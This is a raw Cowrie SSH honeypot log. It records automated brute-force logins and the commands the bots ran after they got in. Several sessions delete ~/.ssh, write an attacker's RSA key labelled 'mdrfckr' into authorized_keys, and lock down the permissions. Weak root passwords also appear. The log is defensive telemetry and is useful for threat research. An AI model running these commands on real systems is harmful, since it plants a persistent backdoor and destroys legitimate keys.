{"eventid":"cowrie.login.success","username":"root","password":"ok","message":"login attempt [root/ok] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:41:10.971180Z","src_ip":"182.18.161.165","session":"3874ed1d5a2a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:41:11.489751Z","src_ip":"182.18.161.165","session":"3874ed1d5a2a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:41:11.490429Z","src_ip":"182.18.161.165","session":"3874ed1d5a2a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:41:11.491305Z","src_ip":"182.18.161.165","session":"3874ed1d5a2a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:41:11.742134Z","src_ip":"182.18.161.165","session":"3874ed1d5a2a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:41:12.356874Z","src_ip":"182.18.161.165","session":"3874ed1d5a2a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:41:12.357547Z","src_ip":"182.18.161.165","session":"3874ed1d5a2a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:41:12.608666Z","src_ip":"182.18.161.165","session":"3874ed1d5a2a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:41:12.609540Z","src_ip":"182.18.161.165","session":"3874ed1d5a2a"}
{"eventid":"cowrie.session.connect","src_ip":"182.18.161.165","src_port":52482,"dst_ip":"1.2.3.4","dst_port":22,"session":"8b7f1fcf50f4","protocol":"ssh","message":"New connection: 182.18.161.165:52482 (1.2.3.4:22) [session: 8b7f1fcf50f4]","sensor":"my-vps","timestamp":"2025-09-08T23:41:12.854852Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:41:12.855612Z","src_ip":"182.18.161.165","session":"8b7f1fcf50f4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:41:13.101553Z","src_ip":"182.18.161.165","session":"8b7f1fcf50f4"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:41:14.124678Z","src_ip":"182.18.161.165","session":"8b7f1fcf50f4"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:41:15.372564Z","src_ip":"182.18.161.165","session":"8b7f1fcf50f4"}
{"eventid":"cowrie.session.connect","src_ip":"182.18.161.165","src_port":52486,"dst_ip":"1.2.3.4","dst_port":22,"session":"6439df53dbb7","protocol":"ssh","message":"New connection: 182.18.161.165:52486 (1.2.3.4:22) [session: 6439df53dbb7]","sensor":"my-vps","timestamp":"2025-09-08T23:41:15.621161Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:41:15.622068Z","src_ip":"182.18.161.165","session":"6439df53dbb7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:41:15.872375Z","src_ip":"182.18.161.165","session":"6439df53dbb7"}
{"eventid":"cowrie.session.connect","src_ip":"45.150.34.92","src_port":36592,"dst_ip":"1.2.3.4","dst_port":22,"session":"c34bd9ab8281","protocol":"ssh","message":"New connection: 45.150.34.92:36592 (1.2.3.4:22) [session: c34bd9ab8281]","sensor":"my-vps","timestamp":"2025-09-08T23:41:16.113918Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:41:16.114583Z","src_ip":"45.150.34.92","session":"c34bd9ab8281"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:41:16.132266Z","src_ip":"45.150.34.92","session":"c34bd9ab8281"}
{"eventid":"cowrie.login.success","username":"root","password":"QQ123456@","message":"login attempt [root/QQ123456@] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:41:16.243412Z","src_ip":"45.150.34.92","session":"c34bd9ab8281"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:41:16.335867Z","src_ip":"45.150.34.92","session":"c34bd9ab8281"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:41:16.336525Z","src_ip":"45.150.34.92","session":"c34bd9ab8281"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:41:16.338097Z","src_ip":"45.150.34.92","session":"c34bd9ab8281"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:41:16.356451Z","src_ip":"45.150.34.92","session":"c34bd9ab8281"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:41:16.408087Z","src_ip":"45.150.34.92","session":"c34bd9ab8281"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:41:16.408772Z","src_ip":"45.150.34.92","session":"c34bd9ab8281"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:41:16.428002Z","src_ip":"45.150.34.92","session":"c34bd9ab8281"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:41:16.428779Z","src_ip":"45.150.34.92","session":"c34bd9ab8281"}
{"eventid":"cowrie.session.connect","src_ip":"45.150.34.92","src_port":36608,"dst_ip":"1.2.3.4","dst_port":22,"session":"44c76c66e8d5","protocol":"ssh","message":"New connection: 45.150.34.92:36608 (1.2.3.4:22) [session: 44c76c66e8d5]","sensor":"my-vps","timestamp":"2025-09-08T23:41:16.444666Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:41:16.445461Z","src_ip":"45.150.34.92","session":"44c76c66e8d5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:41:16.463161Z","src_ip":"45.150.34.92","session":"44c76c66e8d5"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:41:16.576493Z","src_ip":"45.150.34.92","session":"44c76c66e8d5"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:41:16.914926Z","src_ip":"182.18.161.165","session":"6439df53dbb7"}
{"eventid":"cowrie.session.closed","duration":"7.5","message":"Connection lost after 7.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:41:17.166473Z","src_ip":"182.18.161.165","session":"3874ed1d5a2a"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:41:17.167563Z","src_ip":"182.18.161.165","session":"6439df53dbb7"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:41:17.596294Z","src_ip":"45.150.34.92","session":"44c76c66e8d5"}
{"eventid":"cowrie.session.connect","src_ip":"45.150.34.92","src_port":35490,"dst_ip":"1.2.3.4","dst_port":22,"session":"0549dc0e41ae","protocol":"ssh","message":"New connection: 45.150.34.92:35490 (1.2.3.4:22) [session: 0549dc0e41ae]","sensor":"my-vps","timestamp":"2025-09-08T23:41:17.613009Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:41:17.613652Z","src_ip":"45.150.34.92","session":"0549dc0e41ae"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:41:17.631191Z","src_ip":"45.150.34.92","session":"0549dc0e41ae"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:41:17.743610Z","src_ip":"45.150.34.92","session":"0549dc0e41ae"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:41:17.762249Z","src_ip":"45.150.34.92","session":"c34bd9ab8281"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:41:17.763344Z","src_ip":"45.150.34.92","session":"0549dc0e41ae"}
{"eventid":"cowrie.session.connect","src_ip":"93.113.63.124","src_port":32970,"dst_ip":"1.2.3.4","dst_port":22,"session":"b4e95b6e5da2","protocol":"ssh","message":"New connection: 93.113.63.124:32970 (1.2.3.4:22) [session: b4e95b6e5da2]","sensor":"my-vps","timestamp":"2025-09-08T23:41:36.397913Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:41:36.398737Z","src_ip":"93.113.63.124","session":"b4e95b6e5da2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:41:36.542711Z","src_ip":"93.113.63.124","session":"b4e95b6e5da2"}
{"eventid":"cowrie.login.failed","username":"anonymous","password":"qwerty","message":"login attempt [anonymous/qwerty] failed","sensor":"my-vps","timestamp":"2025-09-08T23:41:36.883552Z","src_ip":"93.113.63.124","session":"b4e95b6e5da2"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:41:37.958813Z","src_ip":"93.113.63.124","session":"b4e95b6e5da2"}
{"eventid":"cowrie.session.connect","src_ip":"46.101.8.63","src_port":48758,"dst_ip":"1.2.3.4","dst_port":22,"session":"43ab78863d13","protocol":"ssh","message":"New connection: 46.101.8.63:48758 (1.2.3.4:22) [session: 43ab78863d13]","sensor":"my-vps","timestamp":"2025-09-08T23:41:56.855216Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:41:56.856157Z","src_ip":"46.101.8.63","session":"43ab78863d13"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:41:56.876488Z","src_ip":"46.101.8.63","session":"43ab78863d13"}
{"eventid":"cowrie.login.failed","username":"taibabi","password":"taibabi","message":"login attempt [taibabi/taibabi] failed","sensor":"my-vps","timestamp":"2025-09-08T23:41:57.000591Z","src_ip":"46.101.8.63","session":"43ab78863d13"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:41:58.023992Z","src_ip":"46.101.8.63","session":"43ab78863d13"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57578,"dst_ip":"1.2.3.4","dst_port":22,"session":"b7f34449b784","protocol":"ssh","message":"New connection: 212.227.235.229:57578 (1.2.3.4:22) [session: b7f34449b784]","sensor":"my-vps","timestamp":"2025-09-08T23:42:13.118134Z"}
